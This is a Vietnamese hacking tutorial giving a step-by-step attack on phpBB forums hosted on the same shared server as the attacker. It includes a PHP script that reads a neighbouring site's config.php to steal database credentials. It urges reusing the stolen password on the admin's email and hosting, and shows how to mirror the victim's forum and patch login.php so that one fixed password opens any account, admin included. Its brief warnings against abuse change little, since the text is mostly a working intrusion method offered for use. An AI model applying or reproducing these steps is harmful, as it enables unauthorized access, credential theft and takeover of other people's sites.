Thêm một cách hack Local Site

trang này đã được đọc  lần 

Ví dụ vè hack phpBB.. 100% thành công. 

Bước 1. Xác định URL website cần hack. 

Do đây là free hosting nên website luôn có dạng http://root/yoursite .

Và giả sử forum phpBB nằm tại URL sau http://root/victim/phpBB_path/ 

Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward .. 

Bước 2. Đăng kí một hosting cùng trên server đó. 

Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng 

Giả sử bạn đăng kí một hosting như sau http://root/mysite/ 

Bước 3. Xác định DB info của Victim 

Điều này rất dơn giản khi bạn với victim đang cùng trên một Local 

Thật vậy có thể là /home/user_root/public_html/mysite/ hay /home/user_root/httpdocs/mysite/ tuỳ 
thuộc Control Panel của Server là lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần 
chú ý. 

3.1 Bạn tạo một file để lấy DB info của victim như sau 

## getdb.php begin 

<?php 

$fd = fopen ("../victim/phpBB_path/config.php", "r"); 

while (!feof ($fd)) { 

$line = fgets($fd,4000); 

print $line; 

} 
fclose ($fd); 

?> 

## getdb.php end 

Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem mã nguồn của nó. Vì 
đối với các loại Portal hoặc forum khác có thể DB Info không chứa trong file config.php như của 
phpBB 

3.2 Upload file getdb.php 

Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://root/mysite/getdb.php 

3.3 Lấy DB info của victim 

Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn hình trắng (blank). Đừng 
lo, bạn hãy "View source" và bạn sẽ thấy được các thông tin như sau 

## getdb.php's source begin 

<?php 

// 

// phpBB 2.x auto­generated config file 

// Do not change anything in this file! 

// 

$dbms = "mysql4"; 

$dbhost = "localhost"; 

$dbname = "DB name here"; 

$dbuser = "DB user here"; 

$dbpasswd = "DB passwd here"; 

$table_prefix = "phpbb_"; 
define('PHPBB_INSTALLED', true); 

?> 

## getdb.php's source end 

Xong bước thứ 3 

Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được. 

Với nick Admin trong forum và tất cả những gì có thể liên quan như passwd e­mail, hosting, 
domain .. Vì có thể nạn nhân dùng 1 passwd cho tất cả những mật khẩu của mình cho đỡ quên. 
Đây là một trong những thói quen chết người 

Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5 

Bước 5. Tạo một mirror phpBB forum. 

5.1 Nghĩa là sao, bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của 
bạn http://root/mysite/ 

Và đừng Install forum này nếu bạn muốn hack nó. 

5.2 Config forum vừa upload 

Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum. 

Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được 
DB info của victim trong tay. 

5.2.1 Tạo file config.php 

Đó là toàn bộ những gì bạn vừa "view source" được 

## config.php source begin 

<?php 

// 

// phpBB 2.x auto­generated config file 
// Do not change anything in this file! 

// 

$dbms = "mysql4"; 

$dbhost = "localhost"; 

$dbname = "DB name here"; 

$dbuser = "DB user here"; 

$dbpasswd = "DB passwd here"; 

$table_prefix = "phpbb_"; 

define('PHPBB_INSTALLED', true); 

?> 

## config.php source end 

5.2.2 Upload config.php 

Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload. 

http://root/mysite/config.php 

5.2.3 Thử lại 

Bạn thử gõ http://root/mysite/ xem, nếu mà forum của bạn có các thông số y hệt như của 
http://root/victim/phpBB_path tức là bạn đã thành công bước này 

Bước 6. Sửa mã nguồn Mirror Site 

Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể Login vào được Admin 
panel của nó. Nếu bạn học PHP thì việc này khá dễ dàng. 

Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển. 

6.1 Crack cổ điển 

6.1.1 
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng 
nhiều chương trình hiện nay 

6.1.2 

Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật 
khẩu 

6.1.3 

Sửa thành lệnh nhảy không điều kiên 

6.1.4 

Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận 

6.2 Sửa mã nguồn 

Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn 

6.2.1 Chọn mật khẩu chung cho toàn bộ các nick. 

Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có thể rất khó khăn để 
có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu encode này thì các bạn có thể tự tìm cho mình 
mật khẩu thích hợp, nếu không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là: 
"hainam@hainam.org" 

Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5 nó sẽ là một mật khẩu 
như sau "692e2c95b693cf6fbec8ea5c40536b9e" 

hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e 

6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick 

Trước hết bạn mở file login.php ra tìm đoạn sau 

## file login.php .. 

define("IN_LOGIN", true); 

define('IN_PHPBB', true); 
$phpbb_root_path = './'; 

include($phpbb_root_path . 'extension.inc'); 

include($phpbb_root_path . 'common.'.$phpEx); 

## file login.php .. 

Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e"; 

Tức là sửa đoanj mã đó thành 

## file login.php .. 

define("IN_LOGIN", true); 

define('IN_PHPBB', true); 

$phpbb_root_path = './'; 

include($phpbb_root_path . 'extension.inc'); 

include($phpbb_root_path . 'common.'.$phpEx); 

$hack = "692e2c95b693cf6fbec8ea5c40536b9e"; 

## file login.php .. 

Tiếp đó tìm đoạn mã sau 

## file login.php .. 

else 

{ 

if( md5($password) == $row['user_password'] && $row['user_active'] ) 

{ 

$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0; 

## file login.php .. 
Sửa đoạn mã đó thành 

## file login.php .. 

else 

{ 

if( md5($password) == $hack && $row['user_active'] ) 

{ 

$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0; 

## file login.php .. 

Ghi lại file login.php 

Bước 7. Login User với mật khẩu đã chọn 

Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://root/mysite/login.php với bất cứ 
nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là "hainam@hainam.org" kể cả là nick 
Admin, và vào được Admin Panel .. 

Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ 
không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng 

Tổng quát 

I/Phương Pháp 

­Đây là một ví dụ cho việc hack các website khi trong một local, không chỉ riêng đối với phpBB 
mà có thể áp dụng được cho nhiều Portal hay forum khác, tuy nhiên để có thể hack được từng 
loại bạn đều phải hiểu rất kĩ về nó và tránh lạm dụng quá đáng. 

­Cách hack này tuy mất nhiều thời gian trong việc upload một mirror nhưng rất hiệu quả. Tuy 
nhiên tuyệt đối không nên sử dụng chúng lung tung và bừa bãi. 

­Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng chính vì vậy cũng không nên 
sử dụng phương pháp này khi KHÔNG THỰC SỰ cần thiết 

II/Kinh nghiệm 
Điều quan trọng không phải là chúng ta hack được những cái gì mà là chúng ta học được những 
cái gì. Qua bài viết này mong các bạn nắm rõ được một số thao tác sau 

­Đọc mã nguồn của một file bất kì trên website khi đã cùng một server (Bước 3) 

­Kinh nghiệm về mật khẩu, dò tìm và ghi nhớ (Bước 4) 

­Cách tạo một mirror website hay là cách link DB cho nhiều website (Bước 5) 

­Cách crack cổ điển bằng ASM (Bước 6.1) 

Các bạn nên tìm ra các mối liên hệ giữa các Portal, Forum, Guest Book, Chatroom PHP­CGI,.. để 
có thể áp dụng phương pháp này. Mặt khác các bạn cũng có thể hack được ngay cả đối với các 
domain hosting chứ không phải là các site có dạng http://root/yoursite/ . Và Các Paid hosting 
cũng không ngaọi trừ khả năng bị hack nếu các hacker đã thực sự muốn hack và sẵn sang bỏ 
tiền mua một hosting trên cùng một Server. Phần hack paid hosting và domain tôi xin để cho các 
bạn tự tìm hiểu. Hãy nhớ rằng luôn luôn phải chú ý đến URL Root của mỗi hosting. Ví dụ như ở 
Cpanel thì URL Root cho các domain hosting là http://[IP Server]/~user .vv